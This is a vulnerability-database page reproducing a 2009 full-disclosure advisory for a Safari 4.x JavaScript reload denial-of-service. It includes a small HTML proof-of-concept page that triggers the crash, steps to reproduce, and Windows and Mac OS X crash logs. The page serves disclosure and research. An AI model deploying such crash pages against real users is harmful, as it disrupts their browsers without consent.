Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Apple Safari 4.x Crash Exploit

🗓️ 02 Jul 2009 00:00:00Reported by SkyOutType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 14 Views

Apple Safari 4.x JavaScript Reload Denial of Service, Crash Exploit. Steps to reproduce and advisory included

Code
`___________________________________________________________________________________  
  
Apple Safari 4.x JavaScript Reload Denial of Service  
___________________________________________________________________________________  
  
Author : Marcell 'SkyOut' Dietl, Achim Hoffmann  
Email : mail [at] marcell-dietl [dot] de  
Vendor : http://www.apple.com/  
Product : http://www.apple.com/safari/  
Found : 12.06.2009  
Released : 01.07.2009  
  
Tested on:  
- Safari 4.0 at Windows XP SP3  
- Safari 4.0.1 at Mac OS X 10.5.7  
___________________________________________________________________________________  
STEPS TO REPRODUCE  
  
1) Create a HTML file with the following content:  
  
+----------  
| <html>  
| <body>  
| <script src="empty.js"></script>  
| <script>  
| try { crashSafari(); } catch(e) {  
| setTimeout("location.reload();",42);  
| prompt('apple culpa? comment:'); }  
| </script>  
| </body>  
| </html>  
+----------  
  
2) Create an empty file called "empty.js" in the same directory.  
  
3) Put both files into the WWW directory of your server.  
  
4) Access the HTML file with your browser.  
- A popup will appear: Close it.  
- A popup will appear: Close it.  
- Crash.  
  
5) On Windows:  
  
+----------  
| AppName: safari.exe AppVer: 4.530.17.0 ModName: webkit.dll  
| ModVer: 4.530.17.0 Offset: 00305f55  
+----------  
  
5) On Mac OS X:  
  
+----------  
| Process: Safari [298]  
| Path: /Applications/Safari.app/Contents/MacOS/Safari  
| Identifier: com.apple.Safari  
| Version: 4.0.1 (5530.18)  
| Build Info: WebBrowser-55301800~1  
| Code Type: X86 (Native)  
| Parent Process: launchd [163]  
|  
| Date/Time: 2009-07-01 00:58:48.144 +0200  
| OS Version: Mac OS X 10.5.7 (9J61)  
| Report Version: 6  
|  
| Exception Type: EXC_BAD_ACCESS (SIGBUS)  
| Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000002  
|  
| Thread 0 crashed with X86 Thread State (32-bit):  
| eax: 0x00000002 ebx: 0x900bac11 ecx: 0x00625eec edx: 0x00000000  
| edi: 0x00625ec8 esi: 0x00000002 ebp: 0xbfffe778 esp: 0xbfffe5e0  
| ss: 0x0000001f efl: 0x00010217 eip: 0x900bac74 cs: 0x00000017  
| ds: 0x0000001f es: 0x0000001f fs: 0x00000000 gs: 0x00000037  
| cr2: 0x00000002  
+----------  
___________________________________________________________________________________  
Advisory : http://marcell-dietl.de/index/adv_safari_4_x_js_reload_dos.php  
  
Live Demo : http://marcell-dietl.de/index/demo_safari_4_x_js_reload_dos.html  
  
Apple has been informed about the bug, but did not show any interest.  
___________________________________________________________________________________  
HAVING FUN WITH FULL DISCLOSURE SINCE 2006  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Jul 2009 00:00Current
0.2Low risk
Vulners AI Score0.2
denial of servicesafarijavascriptsecurity exploitfull disclosure.
14